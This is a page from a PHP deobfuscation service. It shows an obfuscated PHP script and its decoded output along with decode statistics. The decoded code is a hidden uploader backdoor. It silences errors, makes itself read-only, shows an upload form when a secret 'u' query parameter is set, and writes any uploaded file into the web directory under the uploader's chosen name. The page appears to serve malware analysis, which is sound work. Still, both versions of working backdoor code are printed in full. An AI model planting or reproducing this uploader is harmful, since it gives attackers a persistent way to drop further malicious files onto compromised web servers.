Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto uVFtb; Uq0cR: goto C4AaJ; goto ONJ99; NewIL: if (!isset($_GET["\165"])) { goto..
Decoded Output download
<?php
goto uVFtb; Uq0cR: goto C4AaJ; goto ONJ99; NewIL: if (!isset($_GET["u"])) { goto hQQ8n; } goto lAUsC; ycBpk: echo "S"; goto FXkv9; ONJ99: bnNxX: goto ycBpk; lAUsC: echo base64_decode("PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JztlY2hvJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSIzMCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4"); goto NKeQE; X0MnF: ZrUAn: goto BXGqI; FXkv9: C4AaJ: goto X0MnF; KFcR5: chmod(basename($_SERVER["PHP_SELF"]), 0444); goto bypyX; rCxXT: if (@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { goto bnNxX; } goto ROTaq; bypyX: echo base64_decode("IzB4MjUyNQ"); goto NewIL; NKeQE: if (!($_POST["_upl"] == "Upload")) { goto ZrUAn; } goto rCxXT; ROTaq: echo "F"; goto Uq0cR; uVFtb: error_reporting(0); goto KFcR5; BXGqI: hQQ8n:?>
Did this file decode correctly?
Original Code
<?php
goto uVFtb; Uq0cR: goto C4AaJ; goto ONJ99; NewIL: if (!isset($_GET["\165"])) { goto hQQ8n; } goto lAUsC; ycBpk: echo "\123"; goto FXkv9; ONJ99: bnNxX: goto ycBpk; lAUsC: echo base64_decode("\120\107\132\x76\143\155\60\x67\131\127\x4e\60\x61\127\71\165\x50\x53\111\x69\x49\107\x31\154\144\107\150\166\x5a\x44\x30\x69\143\x47\x39\x7a\x64\103\x49\147\132\x57\x35\x6a\x64\x48\x6c\167\132\x54\60\x69\142\x58\126\x73\x64\x47\154\x77\131\130\112\x30\114\x32\132\166\x63\x6d\x30\164\132\107\106\60\131\x53\111\147\142\x6d\x46\x74\132\124\60\151\144\130\x42\x73\x62\62\106\x6b\132\x58\x49\151\111\107\154\x6b\x50\x53\x4a\x31\143\107\x78\x76\x59\x57\122\154\143\x69\x49\53\x4a\172\164\154\x59\62\150\x76\x4a\x7a\x78\x70\x62\156\102\61\144\103\102\60\145\x58\x42\154\120\x53\x4a\155\x61\127\x78\x6c\x49\x69\102\165\x59\127\x31\x6c\120\x53\x4a\155\141\x57\x78\154\111\151\102\172\141\x58\x70\154\120\x53\x49\172\115\x43\111\53\120\107\154\x75\x63\x48\126\x30\x49\107\x35\150\142\x57\125\x39\x49\x6c\x39\x31\x63\x47\x77\x69\111\x48\x52\x35\x63\x47\125\x39\111\x6e\116\x31\x59\x6d\61\x70\144\x43\111\x67\x61\127\x51\x39\x49\154\x39\61\x63\x47\x77\x69\x49\x48\x5a\x68\142\110\x56\x6c\x50\123\112\x56\143\107\x78\x76\x59\127\x51\x69\120\152\167\166\x5a\x6d\71\x79\x62\x54\64"); goto NKeQE; X0MnF: ZrUAn: goto BXGqI; FXkv9: C4AaJ: goto X0MnF; KFcR5: chmod(basename($_SERVER["\120\x48\120\x5f\123\105\x4c\106"]), 0444); goto bypyX; rCxXT: if (@copy($_FILES["\x66\151\x6c\145"]["\164\x6d\x70\137\x6e\x61\x6d\x65"], $_FILES["\x66\151\154\145"]["\x6e\141\x6d\x65"])) { goto bnNxX; } goto ROTaq; bypyX: echo base64_decode("\x49\x7a\102\x34\115\x6a\x55\x79\x4e\x51"); goto NewIL; NKeQE: if (!($_POST["\137\x75\x70\154"] == "\x55\x70\x6c\x6f\x61\x64")) { goto ZrUAn; } goto rCxXT; ROTaq: echo "\x46"; goto Uq0cR; uVFtb: error_reporting(0); goto KFcR5; BXGqI: hQQ8n:?>
Function Calls
None |
Stats
MD5 | 4db695a5a9d6c7100ef7db64f2b9a9e5 |
Eval Count | 0 |
Decode Time | 43 ms |